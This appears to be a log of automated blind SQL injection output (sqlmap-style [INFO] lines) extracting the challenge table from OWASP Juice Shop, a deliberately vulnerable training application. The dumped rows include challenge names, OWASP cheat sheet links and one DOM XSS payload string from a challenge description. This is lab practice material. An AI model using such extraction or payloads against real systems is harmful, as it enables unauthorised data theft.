+[12:02:52] [INFO] retrieving the length of query output
+
+[12:02:52] [INFO] retrieved: 95
+[12:02:52] [INFO] retrieved: __________________________________
+[12:02:52] [INFO] retrieved:
+[12:03:02] [INFO] retrieved: ..pting_Prevention_Cheat_Sheet.html
+[12:03:02] [INFO] retrieved: https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html
+[12:03:02] [INFO] retrieving the length of query output
+
+[12:03:02] [INFO] retrieved: 26
+[12:03:02] [INFO] retrieved: __________________________
+[12:03:02] [INFO] retrieved:
+[12:03:05] [INFO] retrieved: Client-side XSS Protection
+[12:03:05] [INFO] retrieved: Client-side XSS Protection
+[12:03:05] [INFO] retrieving the length of query output
+
+[12:03:05] [INFO] retrieved: 1
+
+[12:03:05] [INFO] retrieved: 0
+[12:03:05] [INFO] retrieving the length of query output
+
+[12:03:05] [INFO] retrieved: 11
+[12:03:05] [INFO] retrieved: ___________
+[12:03:05] [INFO] retrieved:
+[12:03:06] [INFO] retrieved: Danger Zone
+[12:03:06] [INFO] retrieved: Danger Zone
+[12:03:06] [INFO] retrieving the length of query output
+
+[12:03:06] [INFO] retrieved:
+
+[12:03:06] [INFO] retrieved:
+[12:03:07] [INFO] retrieving the length of query output
+
+[12:03:07] [INFO] retrieved: 30
+[12:03:07] [INFO] retrieved: ______________________________
+[12:03:07] [INFO] retrieved:
+[12:03:10] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00
+[12:03:10] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00
+[12:03:10] [INFO] retrieving the length of query output
+
+[12:03:10] [INFO] retrieved: 23
+[12:03:10] [INFO] retrieved: _______________________
+[12:03:10] [INFO] retrieved:
+[12:03:16] [INFO] retrieved: Sensitive Data Exposure
+[12:03:16] [INFO] retrieved: Sensitive Data Exposure
+[12:03:16] [INFO] retrieving the length of query output
+
+[12:03:16] [INFO] retrieved: 1
+
+[12:03:17] [INFO] retrieved: 0
+[12:03:17] [INFO] retrieving the length of query output
+
+[12:03:17] [INFO] retrieved: 30
+[12:03:17] [INFO] retrieved: ______________________________
+[12:03:17] [INFO] retrieved:
+[12:03:20] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00
+[12:03:20] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00
+[12:03:20] [INFO] retrieving the length of query output
+
+[12:03:20] [INFO] retrieved: 31
+[12:03:20] [INFO] retrieved: _______________________________
+[12:03:20] [INFO] retrieved:
+[12:03:24] [INFO] retrieved: Access a confidential document.
+[12:03:24] [INFO] retrieved: Access a confidential document.
+[12:03:24] [INFO] retrieving the length of query output
+
+[12:03:24] [INFO] retrieved: 1
+
+[12:03:24] [INFO] retrieved: 1
+[12:03:24] [INFO] retrieving the length of query output
+
+[12:03:24] [INFO] retrieved:
+
+[12:03:24] [INFO] retrieved:
+[12:03:24] [INFO] retrieving the length of query output
+
+[12:03:24] [INFO] retrieved: 1
+
+[12:03:24] [INFO] retrieved: 1
+[12:03:24] [INFO] retrieving the length of query output
+
+[12:03:24] [INFO] retrieved: 2
+[12:03:24] [INFO] retrieved: __
+[12:03:24] [INFO] retrieved:
+[12:03:25] [INFO] retrieved: 18
+[12:03:25] [INFO] retrieved: 18
+[12:03:25] [INFO] retrieving the length of query output
+
+[12:03:25] [INFO] retrieved: 25
+[12:03:25] [INFO] retrieved: _________________________
+[12:03:25] [INFO] retrieved:
+[12:03:27] [INFO] retrieved: directoryListingChallenge
+[12:03:27] [INFO] retrieved: directoryListingChallenge
+[12:03:27] [INFO] retrieving the length of query output
+
+[12:03:27] [INFO] retrieved:
+
+[12:03:27] [INFO] retrieved:
+[12:03:28] [INFO] retrieving the length of query output
+
+[12:03:28] [INFO] retrieved: 21
+[12:03:28] [INFO] retrieved: _____________________
+[12:03:28] [INFO] retrieved:
+[12:03:30] [INFO] retrieved: Confidential Document
+[12:03:30] [INFO] retrieved: Confidential Document
+[12:03:30] [INFO] retrieving the length of query output
+
+[12:03:30] [INFO] retrieved: 1
+
+[12:03:30] [INFO] retrieved: 1
+[12:03:30] [INFO] retrieving the length of query output
+
+[12:03:30] [INFO] retrieved: 36
+[12:03:30] [INFO] retrieved: __________________________________
+[12:03:30] [INFO] retrieved:
+[12:03:34] [INFO] retrieved: ..d for Demos,With Coding Challenge
+[12:03:34] [INFO] retrieved: Good for Demos,With Coding Challenge
+[12:03:34] [INFO] retrieving the length of query output
+
+[12:03:34] [INFO] retrieved:
+
+[12:03:34] [INFO] retrieved:
+[12:03:34] [INFO] retrieving the length of query output
+
+[12:03:34] [INFO] retrieved: 30
+[12:03:34] [INFO] retrieved: ______________________________
+[12:03:34] [INFO] retrieved:
+[12:03:38] [INFO] retrieved: 2026-05-08 08:45:15.511 +00:00
+[12:03:38] [INFO] retrieved: 2026-05-08 08:45:15.511 +00:00
+[12:03:38] [INFO] retrieving the length of query output
+
+[12:03:38] [INFO] retrieved: 3
+[12:03:38] [INFO] retrieved: ___
+[12:03:38] [INFO] retrieved:
+[12:03:38] [INFO] retrieved: XSS
+[12:03:38] [INFO] retrieved: XSS
+[12:03:38] [INFO] retrieving the length of query output
+
+[12:03:38] [INFO] retrieved: 1
+
+[12:03:38] [INFO] retrieved: 0
+[12:03:39] [INFO] retrieving the length of query output
+
+[12:03:39] [INFO] retrieved: 30
+[12:03:39] [INFO] retrieved: ______________________________
+[12:03:39] [INFO] retrieved:
+[12:03:42] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00
+[12:03:42] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00
+[12:03:42] [INFO] retrieving the length of query output
+
+[12:03:42] [INFO] retrieved: 95
+[12:03:43] [INFO] retrieved: __________________________________
+[12:03:43] [INFO] retrieved:
+[12:03:56] [INFO] retrieved: ..ascript:alert(`xss`)">.
+[12:03:56] [INFO] retrieved: Perform a DOM XSS attack with <iframe src="javascript:alert(`xss`)">.
+[12:03:56] [INFO] retrieving the length of query output
+
+[12:03:56] [INFO] retrieved: 1
+
+[12:03:56] [INFO] retrieved: 1
+[12:03:56] [INFO] retrieving the length of query output
+
+[12:03:56] [INFO] retrieved:
+
+[12:03:56] [INFO] retrieved:
+[12:03:57] [INFO] retrieving the length of query output
+
+[12:03:57] [INFO] retrieved: 1
+
+[12:03:57] [INFO] retrieved: 1
+[12:03:57] [INFO] retrieving the length of query output
+
+[12:03:57] [INFO] retrieved: 2
+[12:03:57] [INFO] retrieved: __
+[12:03:57] [INFO] retrieved:
+[12:03:57] [INFO] retrieved: 19
+[12:03:57] [INFO] retrieved: 19
+[12:03:57] [INFO] retrieving the length of query output
+
+[12:03:57] [INFO] retrieved: 17
+[12:03:57] [INFO] retrieved: _________________
+[12:03:57] [INFO] retrieved:
+[12:03:59] [INFO] retrieved: localXssChallenge
+[12:03:59] [INFO] retrieved: localXssChallenge
+[12:03:59] [INFO] retrieving the length of query output
+
+[12:03:59] [INFO] retrieved: 88
+[12:04:00] [INFO] retrieved: __________________________________
+[12:04:00] [INFO] retrieved:
+[12:04:10] [INFO] retrieved: ..d_XSS_Prevention_Cheat_Sheet.html
+[12:04:10] [INFO] retrieved: https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html
+[12:04:10] [INFO] retrieving the length of query output
+
+[12:04:10] [INFO] retrieved: 7
+[12:04:10] [INFO] retrieved: _______
+[12:04:10] [INFO] retrieved:
+[12:04:10] [INFO] retrieved: DOM XSS
+[12:04:11] [INFO] retrieved: DOM XSS
+[12:04:11] [INFO] retrieving the length of query output
+
+[12:04:11] [INFO] retrieved: 1
+
+[12:04:11] [INFO] retrieved: 0
+[12:04:11] [INFO] retrieving the length of query output
+
+[12:04:11] [INFO] retrieved: 45
+[12:04:11] [INFO] retrieved: __________________________________
+[12:04:11] [INFO] retrieved:
+[12:04:17] [INFO] retrieved: ..d for Demos,With Coding Challenge
+[12:04:17] [INFO] retrieved: Tutorial,Good for Demos,With Coding Challenge
+[12:04:17] [INFO] retrieving the length of query output
+
+[12:04:17] [INFO] retrieved: 1
+
+[12:04:17] [INFO] retrieved: 2
+[12:04:17] [INFO] retrieving the length of query output
+
+[12:04:17] [INFO] retrieved: 30
+[12:04:17] [INFO] retrieved: ______________________________
+[12:04:17] [INFO] retrieved:
+[12:04:20] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00
+[12:04:20] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00
+[12:04:20] [INFO] retrieving the length of query output
+
+[12:04:20] [INFO] retrieved: 9
+[12:04:21] [INFO] retrieved: _________
+[12:04:21] [INFO] retrieved:
+[12:04:22] [INFO] retrieved: Injection
+[12:04:24] [INFO] retrieved: Injection
+[12:04:24] [INFO] retrieving the length of query output
+
+[12:04:24] [INFO] retrieved: 1
+
+[12:04:25] [INFO] retrieved: 0
+[12:04:25] [INFO] retrieving the length of query output
+
+[12:04:25] [INFO] retrieved: 30
+[12:04:25] [INFO] retrieved: ______________________________
+[12:04:25] [INFO] retrieved:
+[12:04:28] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00
+[12:04:28] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00
+[12:04:28] [INFO] retrieving the length of query output
+
+[12:04:28] [INFO] retrieved: 61
+[12:04:29] [INFO] retrieved: __________________________________
+[12:04:29] [INFO] retrieved:
+[12:04:35] [INFO] retrieved: ..ema definition via SQL Injection.
+[12:04:35] [INFO] retrieved: Exfiltrate the entire DB schema definition via SQL Injection.
+[12:04:35] [INFO] retrieving the length of query output
+
+[12:04:35] [INFO] retrieved: 1
+
+[12:04:35] [INFO] retrieved: 3
+[12:04:35] [INFO] retrieving the length of query output
+
+[12:04:35] [INFO] retrieved:
+
+[12:04:35] [INFO] retrieved:
+[12:04:36] [INFO] retrieving the length of query output
+
+[12:04:36] [INFO] retrieved: 1
+
+[12:04:36] [INFO] retrieved: 1
+[12:04:36] [INFO] retrieving the length of query output
+
+[12:04:36] [INFO] retrieved: 2
+[12:04:36] [INFO] retrieved: __
+[12:04:36] [INFO] retrieved:
+[12:04:36] [INFO] retrieved: 20
+[12:04:36] [INFO] retrieved: 20
+[12:04:36] [INFO] retrieving the length of query output
+
+[12:04:36] [INFO] retrieved: 17
+[12:04:36] [INFO] retrieved: _________________
+[12:04:36] [INFO] retrieved:
+[12:04:38] [INFO] retrieved: dbSchemaChallenge
+[12:04:38] [INFO] retrieved: dbSchemaChallenge
+[12:04:38] [INFO] retrieving the length of query output
+
+[12:04:38] [INFO] retrieved: 88
+[12:04:38] [INFO] retrieved: __________________________________
+[12:04:38] [INFO] retrieved:
+[12:04:47] [INFO] retrieved: ..ction_Prevention_Cheat_Sheet.html
+[12:04:48] [INFO] retrieved: https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html
+[12:04:48] [INFO] retrieving the length of query output
+
+[12:04:48] [INFO] retrieved: 15
+[12:04:48] [INFO] retrieved: _______________
+[12:04:48] [INFO] retrieved:
+[12:04:49] [INFO] retrieved: Database Schema
+[12:04:49] [INFO] retrieved: Database Schema
+[12:04:49] [INFO] retrieving the length of query output
+
+[12:04:49] [INFO] retrieved: 1
+
+[12:04:49] [INFO] retrieved: 0
+[12:04:50] [INFO] retrieving the length of query output
+
+[12:04:50] [INFO] retrieved: 21
+[12:04:50] [INFO] retrieved: _____________________
+[12:04:50] [INFO] retrieved:
+[12:04:52] [INFO] retrieved: With Coding Challenge
+[12:04:52] [INFO] retrieved: With Coding Challenge
+[12:04:52] [INFO] retrieving the length of query output
+
+[12:04:52] [INFO] retrieved:
+
+[12:04:52] [INFO] retrieved:
+[12:04:52] [INFO] retrieving the length of query output
+
+[12:04:52] [INFO] retrieved: 30
+[12:04:52] [INFO] retrieved: ______________________________
+[12:04:52] [INFO] retrieved:
+[12:04:56] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00
+[12:04:56] [INFO] retrieved: 2026-05-08 08:29:59.465 +00:00
+[12:04:56] [INFO] retrieving the length of query output
+
+[12:04:56] [INFO] retrieved: 25
+[12:04:56] [INFO] retrieved: _________________________
+[12:04:56] [INFO] retrieved:
+[12:05:02] [INFO] retrieved: Security Misconfiguration
+[12:05:02] [INFO] retrieved: Security Misconfiguration
+[12:05:02] [INFO] retrieving the length of query output
+
+[12:05:02] [INFO] retrieved: 1
+
+[12:05:02] [INFO] retrieved: 0
+[12:05:02] [INFO] retrieving the length of query output
+
+[12:05:02] [INFO] retrieved: 30
+[12:05:02] [INFO] retrieved: ______________________________
+[12:05:02] [INFO] retrieved:
+[12:05:06] [INFO] retrieved: 2026-05-08 08:29:59.466 +00:00
+[12:05:06] [INFO] retrieved: 2026-05-08 08:29:59.466 +00:00
+[12:05:06] [INFO] retrieving the length of query output
+
+[12:05:06] [INFO] retrieved: 63
+[12:05:06] [INFO] retrieved: __________________________________
+[12:05:06] [INFO] retrieved:
+[12:05:12] [INFO] retrieved: .. that was not properly shut down.
+[12:05:12] [INFO] retrieved: Use a deprecated B2B interface that was not properly shut down.
+[12:05:12] [INFO] retrieving the length of query output
+
+[12:05:12] [INFO] retrieved: 1
+
+[12:05:12] [INFO] retrieved: 2
+[12:05:13] [INFO] retrieving the length of query output
+
+[12:05:13] [INFO] retrieved:
+
+[12:05:13] [INFO] retrieved:
+[12:05:13] [INFO] retrieving the length of query output
+
+[12:05:13] [INFO] retrieved: 1
+
+[12:05:13] [INFO] retrieved: 0
+[12:05:13] [INFO] retrieving the length of query output
+
+[12:05:13] [INFO] retrieved: 2
+[12:05:13] [INFO] retrieved: __
+[12:05:13] [INFO] retrieved:
+[12:05:14] [INFO] retrieved: 21
+[12:05:14] [INFO] retrieved: 21
+[12:05:14] [INFO] retrieving the length of query output
+
+[12:05:14] [INFO] retrieved: 28
+[12:05:14] [INFO] retrieved: ____________________________
+[12:05:14] [INFO] retrieved:
+[12:05:17] [INFO] retrieved: deprecatedInterfaceChallenge
+[12:05:17] [INFO] retrieved: deprecatedInterfaceChallenge
+[12:05:17] [INFO] retrieving the length of query output
+
+[12:05:17] [INFO] retrieved: 84
+[12:05:17] [INFO] retrieved: __________________________________
+[12:05:17] [INFO] retrieved:
+[12:05:26] [INFO] retrieved: ..Service_Security_Cheat_Sheet.html
+[12:05:26] [INFO] retrieved: https://cheatsheetseries.owasp.org/cheatsheets/Web_Service_Security_Cheat_Sheet.html
+[12:05:26] [INFO] retrieving the length of query output
+
+[12:05:26] [INFO] retrieved: 20
+[12:05:26] [INFO] retrieved: ____________________
+[12:05:26] [INFO] retrieved:
+[12:05:28] [INFO] retrieved: Deprecated Interface
+[12:05:28] [INFO] retrieved: Deprecated Interface
+[12:05:28] [INFO] retrieving the length of query output
+
+[12:05:28] [INFO] retrieved: 1
+
+[12:05:28] [INFO] retrieved: 0
+[12:05:28] [INFO] retrieving the length of query output
+
+[12:05:28] [INFO] retrieved: 24
+[12:05:28] [INFO] retrieved: ________________________
+[12:05:28] [INFO] retrieved:
+[12:05:31] [INFO] retrieved: Contraption,Prerequisite
+[12:05:31] [INFO] retrieved: Contraption,Prerequisite
+[12:05:31] [INFO] retrieving the length of query output
+
+[12:05:31] [INFO] retrieved:
+
+[12:05:31] [INFO] retrieved:
+[12:05:31] [INFO] retrieving the length of query output
+
+[12:05:31] [INFO] retrieved: 30
+[12:05:31] [INFO] retrieved: ______________________________
+[12:05:31] [INFO] retrieved:
+[12:05:37] [INFO] retrieved: 2026-05-08 08:29:59.466 +00:00
+[12:05:37] [INFO] retrieved: 2026-05-08 08:29:59.466 +00:00
+[12:05:37] [INFO] retrieving the length of query output
+
+[12:05:37] [INFO] retrieved: 21
+[12:05:37] [INFO] retrieved: _____________________
+[12:05:37] [INFO] retrieved:
+[12:05:40] [INFO] retrieved: Broken Access Control
+[12:05:40] [INFO] retrieved: Broken Access Control
+[12:05:40] [INFO] retrieving the length of query output
+
+[12:05:40] [INFO] retrieved: 1
+
+[12:05:40] [INFO] retrieved: 0
+[12:05:40] [INFO] retrieving the length of query output
+
+[12:05:40] [INFO] retrieved: 30
+[12:05:40] [INFO] retrieved: ______________________________
+[12:05:40] [INFO] retrieved:
+[12:05:43] [INFO] retrieved: 2026-05-08 08:29:59.466 +00:00
+[12:05:43] [INFO] retrieved: 2026-05-08 08:29:59.466 +00:00
+[12:05:43] [INFO] retrieving the length of query output
+
+[12:05:43] [INFO] retrieved: 106
+[12:05:44] [INFO] retrieved: __________________________________
+[12:05:44] [INFO] retrieved:
+[12:05:55] [INFO] retrieved: .." target="_blank">easter egg.
+[12:05:55] [INFO] retrieved: Find the hidden easter egg.
+[12:05:55] [INFO] retrieving the length of query output
+
+[12:05:55] [INFO] retrieved: 1
+
+[12:05:55] [INFO] retrieved: 4
+[12:05:55] [INFO] retrieving the length of query output
+
+[12:05:55] [INFO] retrieved:
+
+[12:05:55] [INFO] retrieved:
+[12:05:55] [INFO] retrieving the length of query output
+
+[12:05:55] [INFO] retrieved: 1
+
+[12:05:56] [INFO] retrieved: 0
+[12:05:56] [INFO] retrieving the length of query output
+
+[12:05:56] [INFO] retrieved: 2
+[12:05:56] [INFO] retrieved: __
+[12:05:56] [INFO] retrieved:
+[12:05:56] [INFO] retrieved: 22
+[12:05:56] [INFO] retrieved: 22
+[12:05:56] [INFO] retrieving the length of query output
+
+[12:05:56] [INFO] retrieved: 26
+[12:05:56] [INFO] retrieved: __________________________
+[12:05:56] [INFO] retrieved:
+[12:05:59] [INFO] retrieved: easterEggLevelOneChallenge
+[12:05:59] [INFO] retrieved: easterEggLevelOneChallenge
+[12:05:59] [INFO] retrieving the length of query output
+
+[12:05:59] [INFO] retrieved:
+
+[12:05:59] [INFO] retrieved:
+[12:05:59] [INFO] retrieving the length of query output
+
+[12:05:59] [INFO] retrieved: 10
+[12:06:00] [INFO] retrieved: __________
+[12:06:00] [INFO] retrieved:
+[12:06:01] [INFO] retrieved: Easter Egg
+[12:06:01] [INFO] retrieved: Easter Egg
+[12:06:01] [INFO] retrieving the length of query output
+
+[12:06:01] [INFO] retrieved: 1
+
+[12:06:01] [INFO] retrieved: 0
+[12:06:01] [INFO] retrieving the length of query output
+
+[12:06:01] [INFO] retrieved: 38
+[12:06:01] [INFO] retrieved: __________________________________
+[12:06:01] [INFO] retrieved:
+[12:06:05] [INFO] retrieved: ..nigans,Contraption,Good for Demos
+[12:06:05] [INFO] retrieved: Shenanigans,Contraption,Good for Demos
+[12:06:05] [INFO] retrieving the length of query output
+
+[12:06:05] [INFO] retrieved:
+
+[12:06:05] [INFO] retrieved:
+[12:06:05] [INFO] retrieving the length of query output
+
+[12:06:05] [INFO] retrieved: 30
+[12:06:05] [INFO] retrieved: ______________________________
+[12:06:05] [INFO] retrieved:
+[12:06:09] [INFO] retrieved: 2026-05-08 08:29:59.466 +00:00
+[12:06:09] [INFO] retrieved: 2026-05-08 08:29:59.466 +00:00
+[12:06:09] [INFO] retrieving the length of query output
+
+[12:06:09] [INFO] retrieved: 23
+[12:06:09] [INFO] retrieved: _______________________
+[12:06:09] [INFO] retrieved:
+[12:06:12] [INFO] retrieved: Sensitive Data Exposure
+[12:06:12] [INFO] retrieved: Sensitive Data Exposure
+[12:06:12] [INFO] retrieving the length of query output
+
+[12:06:12] [INFO] retrieved: 1
+
+[12:06:12] [INFO] retrieved: 0
+[12:06:12] [INFO] retrieving the length of query output
+
+[12:06:12] [INFO] retrieved: 30
+[12:06:12] [INFO] retrieved: ______________________________
+[12:06:12] [INFO] retrieved:
+[12:06:16] [INFO] retrieved: 2026-05-08 08:29:59.466 +00:00
+[12:06:16] [INFO] retrieved: 2026-05-08 08:29:59.466 +00:00
+[12:06:16] [INFO] retrieving the length of query output
+
+[12:06:16] [INFO] retrieved: 74
+[12:06:16] [INFO] retrieved: __________________________________
+[12:06:16] [INFO] retrieved:
+[12:06:23] [INFO] retrieved: ..e by accessing data cross-domain.
+[12:06:23] [INFO] retrieved: Perform an unwanted information disclosure by accessing data cross-domain.
+[12:06:23] [INFO] retrieving the length of query output
+
+[12:06:23] [INFO] retrieved: 1
+
+[12:06:23] [INFO] retrieved: 5
+[12:06:28] [INFO] retrieving the length of query output
+
+[12:06:28] [INFO] retrieved:
+
+[12:06:28] [INFO] retrieved:
+[12:06:28] [INFO] retrieving the length of query output
+
+[12:06:28] [INFO] retrieved: 1
+
+[12:06:28] [INFO] retrieved: 0
+[12:06:28] [INFO] retrieving the length of query output
+
+[12:06:28] [INFO] retrieved: 2
+[12:06:29] [INFO] retrieved: __
+[12:06:29] [INFO] retrieved:
+[12:06:29] [INFO] retrieved: 23
+[12:06:29] [INFO] retrieved: 23
+[12:06:29] [INFO] retrieving the length of query output
+
+[12:06:29] [INFO] retrieved: 18
+[12:06:29] [INFO] retrieved: __________________
+[12:06:29] [INFO] retrieved:
+[12:06:31] [INFO] retrieved: emailLeakChallenge
+[12:06:31] [INFO] retrieved: emailLeakChallenge
+[12:06:31] [INFO] retrieving the length of query output
+
+[12:06:31] [INFO] retrieved: 72
+[12:06:31] [INFO] retrieved: __________________________________
+[12:06:31] [INFO] retrieved:
+[12:06:38] [INFO] retrieved: ..tsheets/XS_Leaks_Cheat_Sheet.html
+[12:06:39] [INFO] retrieved: https://cheatsheetseries.owasp.org/cheatsheets/XS_Leaks_Cheat_Sheet.html
+[12:06:39] [INFO] retrieving the length of query output
+
+[12:06:39] [INFO] retrieved: 10
+[12:06:39] [INFO] retrieved: __________
+[12:06:39] [INFO] retrieved:
+[12:06:40] [INFO] retrieved: Email Leak
+[12:06:40] [INFO] retrieved: Email Leak
+[12:06:40] [INFO] retrieving the length of query output
+
+[12:06:40] [INFO] retrieved: 1
+
+[12:06:40] [INFO] retrieved: 0
+[12:06:40] [INFO] retrieving the length of query output
+
+[12:06:40] [INFO] retrieved:
+
+[12:06:40] [INFO] retrieved:
+[12:06:40] [INFO] retrieving the length of query output
+
+[12:06:40] [INFO] retrieved:
+
+[12:06:40] [INFO] retrieved:
+[12:06:40] [INFO] retrieving the length of query output
+
+[12:06:40] [INFO] retrieved: 30
+[12:06:41] [INFO] retrieved: ______________________________
+[12:06:41] [INFO] retrieved:
+[12:06:44] [INFO] retrieved: 2026-05-08 08:29:59.466 +00:00
+[12:06:44] [INFO] retrieved: 2026-05-08 08:29:59.466 +00:00
+[12:06:44] [INFO] retrieving the length of query output
+
+[12:06:44] [INFO] retrieved: 25
+[12:06:44] [INFO] retrieved: _________________________
+[12:06:44] [INFO] retrieved:
+[12:06:47] [INFO] retrieved: Improper Input Validation
+[12:06:47] [INFO] retrieved: Improper Input Validation
+[12:06:47] [INFO] retrieving the length of query output
+
+[12:06:47] [INFO] retrieved: 1
+
+[12:06:47] [INFO] retrieved: 0
+[12:06:47] [INFO] retrieving the length of query output
+
+[12:06:47] [INFO] retrieved: 30
+[12:06:48] [INFO] retrieved: ______________________________
+[12:06:48] [INFO] retrieved:
+[12:06:51] [INFO] retrieved: 2026-05-08 08:29:59.466 +00:00
+[12:06:51] [INFO] retrieved: 2026-05-08 08:29:59.466 +00:00
+[12:06:51] [INFO] retrieving the length of query output
+
+[12:06:51] [INFO] retrieved: 49
+[12:06:51] [INFO] retrieved: __________________________________
+[12:06:51] [INFO] retrieved:
+[12:06:56] [INFO] retrieved: ..with an empty email and password.
+[12:06:56] [INFO] retrieved: Register a user with an empty email and password.
+[12:06:56] [INFO] retrieving the length of query output
+
+[12:06:56] [INFO] retrieved: 1
+
+[12:06:56] [INFO] retrieved: 2
+[12:06:56] [INFO] retrieving the length of query output
+
+[12:06:56] [INFO] retrieved:
+
+[12:06:56] [INFO] retrieved:
+[12:06:57] [INFO] retrieving the length of query output
+
+[12:06:57] [INFO] retrieved: 1
+
+[12:06:57] [INFO] retrieved: 0
+[12:06:57] [INFO] retrieving the length of query output
+
+[12:06:57] [INFO] retrieved: 2
+[12:06:57] [INFO] retrieved: __
+[12:06:57] [INFO] retrieved:
+[12:06:57] [INFO] retrieved: 24
+[12:06:57] [INFO] retrieved: 24
+[12:06:57] [INFO] retrieving the length of query output
+
+[12:06:57] [INFO] retrieved: 21
+[12:06:57] [INFO] retrieved: _____________________
+[12:06:57] [INFO] retrieved:
+[12:07:00] [INFO] retrieved: emptyUserRegistration
+[12:07:00] [INFO] retrieved: emptyUserRegistration
+[12:07:00] [INFO] retrieving the length of query output
+
+[12:07:00] [INFO] retrieved: 80
+[12:07:00] [INFO] retrieved: __________________________________
+[12:07:00] [INFO] retrieved:
+[12:07:11] [INFO] retrieved: ..Input_Validation_Cheat_Sheet.html
+[12:07:11] [INFO] retrieved: https://cheatsheetseries.owasp.org/cheatsheets/Input_Validation_Cheat_Sheet.html
+[12:07:11] [INFO] retrieving the length of query output
+
+[12:07:11] [INFO] retrieved: 23
+[12:07:11] [INFO] retrieved: _______________________
+[12:07:11] [INFO] retrieved:
+[12:07:14] [INFO] retrieved: Empty User Registration
+[12:07:14] [INFO] retrieved: Empty User Registration
+[12:07:14] [INFO] retrieving the length of query output
+
+[12:07:14] [INFO] retrieved: 1
+
+[12:07:14] [INFO] retrieved: 0
+[12:07:14] [INFO] retrieving the length of query output
+
+[12:07:14] [INFO] retrieved:
+
+[12:07:14] [INFO] retrieved:
+[12:07:14] [INFO] retrieving the length of query output
+
+[12:07:14] [INFO] retrieved:
+
+[12:07:14] [INFO] retrieved:
+[12:07:14] [INFO] retrieving the length of query output
+
+[12:07:14] [INFO] retrieved: 30
+[12:07:15] [INFO] retrieved: ______________________________
+[12:07:15] [INFO] retrieved:
+[12:07:18] [INFO] retrieved: 2026-05-08 08:29:59.466 +00:00
+[12:07:18] [INFO] retrieved: 2026-05-08 08:29:59.466 +00:00
+[12:07:18] [INFO] retrieving the length of query output
+
+[12:07:18] [INFO] retrieved: 9
+[12:07:18] [INFO] retrieved: _________
+[12:07:18] [INFO] retrieved:
+[12:07:19] [INFO] retrieved: Injection
+[12:07:19] [INFO] retrieved: Injection
+[12:07:19] [INFO] retrieving the length of query output
+
+[12:07:19] [INFO] retrieved: 1
+
+[12:07:19] [INFO] retrieved: 0
+[12:07:19] [INFO] retrieving the length of query output
+
+[12:07:19] [INFO] retrieved: 30
+[12:07:20] [INFO] retrieved: ______________________________
+[12:07:20] [INFO] retrieved:
+[12:07:23] [INFO] retrieved: 2026-05-08 08:29:59.466 +00:00
+[12:07:23] [INFO] retrieved: 2026-05-08 08:29:59.466 +00:00
+[12:07:23] [INFO] retrieving the length of query output
+
+[12:07:23] [INFO] retrieved: 107
+[12:07:23] [INFO] retrieved: __________________________________
+[12:07:23] [INFO] retrieved:
+[12:07:34] [INFO] retrieved: ..thout ever registering that user.
+[12:07:34] [INFO] retrieved: Log in with the (non-existing) accountant acc0unt4nt@juice-sh.op without ever registering that user.
+[12:07:34] [INFO] retrieving the length of query output
+
+[12:07:34] [INFO] retrieved: 1
+
+[12:07:34] [INFO] retrieved: 4
+[12:07:34] [INFO] retrieving the length of query output
+
+[12:07:34] [INFO] retrieved:
+
+[12:07:34] [INFO] retrieved:
+[12:07:34] [INFO] retrieving the length of query output
+
+[12:07:34] [INFO] retrieved: 1
+
+[12:07:35] [INFO] retrieved: 0
+[12:07:35] [INFO] retrieving the length of query output
+
+[12:07:35] [INFO] retrieved: 2
+[12:07:35] [INFO] retrieved: __
+[12:07:35] [INFO] retrieved:
+[12:07:35] [INFO] retrieved: 25
+[12:07:35] [INFO] retrieved: 25
+[12:07:35] [INFO] retrieving the length of query output
+
+[12:07:35] [INFO] retrieved: 28
+[12:07:38] [INFO] retrieved: ____________________________
+[12:07:38] [INFO] retrieved:
+[12:07:41] [INFO] retrieved: ephemeralAccountantChallenge
+[12:07:41] [INFO] retrieved: ephemeralAccountantChallenge
+[12:07:41] [INFO] retrieving the length of query output
+
+[12:07:41] [INFO] retrieved: 88
+[12:07:41] [INFO] retrieved: __________________________________
+[12:07:41] [INFO] retrieved:
+[12:07:50] [INFO] retrieved: ..ction_Prevention_Cheat_Sheet.html
+[12:07:50] [INFO] retrieved: https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html
+[12:07:50] [INFO] retrieving the length of query output
+
+[12:07:50] [INFO] retrieved: 20
+[12:07:51] [INFO] retrieved: ____________________
+[12:07:51] [INFO] retrieved:
+[12:07:53] [INFO] retrieved: Ephemeral Accountant
+[12:07:53] [INFO] retrieved: Ephemeral Accountant
+[12:07:53] [INFO] retrieving the length of query output
+
+[12:07:53] [INFO] retrieved: 1
+
+[12:07:53] [INFO] retrieved: 0
+[12:07:53] [INFO] retrieving the length of query output
+
+[12:07:53] [INFO] retrieved:
+
+[12:07:53] [INFO] retrieved:
+[12:07:53] [INFO] retrieving the length of query output
+
+[12:07:53] [INFO] retrieved:
+
+[12:07:53] [INFO] retrieved:
+[12:07:53] [INFO] retrieving the length of query output
+
+[12:07:53] [INFO] retrieved: 30
+[12:07:53] [INFO] retrieved: ______________________________
+[12:07:53] [INFO] retrieved:
+[12:07:57] [INFO] retrieved: 2026-05-08 08:29:59.466 +00:00
+[12:07:57] [INFO] retrieved: 2026-05-08 08:29:59.466 +00:00
+[12:07:57] [INFO] retrieving the length of query output
+
+[12:07:57] [INFO] retrieved: 25
+[12:07:57] [INFO] retrieved: _________________________
+[12:07:57] [INFO] retrieved:
+[12:07:59] [INFO] retrieved: Security Misconfiguration
+[12:08:00] [INFO] retrieved: Security Misconfiguration
+[12:08:00] [INFO] retrieving the length of query output
+
+[12:08:00] [INFO] retrieved: 1
+
+[12:08:00] [INFO] retrieved: 0
+[12:08:00] [INFO] retrieving the length of query output
+
+[12:08:00] [INFO] retrieved: 30
+[12:08:00] [INFO] retrieved: ______________________________
+[12:08:00] [INFO] retrieved:
